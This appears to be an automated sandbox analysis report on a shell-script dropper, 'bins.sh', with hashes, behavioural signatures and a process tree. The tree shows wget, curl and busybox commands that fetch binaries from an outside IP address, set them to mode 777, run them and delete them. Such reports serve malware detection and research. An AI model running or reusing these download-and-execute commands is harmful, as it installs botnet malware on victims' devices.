Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
27-10-2024 21:13
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid process 743 chmod 796 chmod 836 chmod 726 chmod 734 chmod -
Executes dropped EXE 5 IoCs
Processes:
GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6MszSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWtxVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVFCApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRsjvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOaioc pid process /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 727 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 735 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 744 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 797 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 837 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa -
Processes:
curlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetbusyboxcurlcurlbusyboxwgetcurlbusyboxwgetcurlbusyboxwgetcurlbusyboxdescription ioc process File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms wget File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt wget File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa wget File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs busybox File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF busybox File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs wget File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa busybox File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB wget File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt busybox File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF wget File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:696
-
/bin/rm/bin/rm bins.sh2⤵PID:698
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:703
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:723
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Writes file to tmp directory
PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Writes file to tmp directory
PID:733
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Writes file to tmp directory
PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Writes file to tmp directory
PID:740
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Writes file to tmp directory
PID:788
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Writes file to tmp directory
PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Writes file to tmp directory
PID:835
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Writes file to tmp directory
PID:840
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
PID:841
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
80KB
MD522c527269cbd9b42f4ade79f52757efb
SHA1c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA5127b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53
-
Filesize
108KB
MD5c97a9c55ddb153e8bfce38f201d2cffb
SHA13970452f27327f98c2e3fdcabf0390067b48bd62
SHA256138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA5121734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
122KB
MD5aadb8cc4b6eac7fce760c09262693884
SHA1b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA5125567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df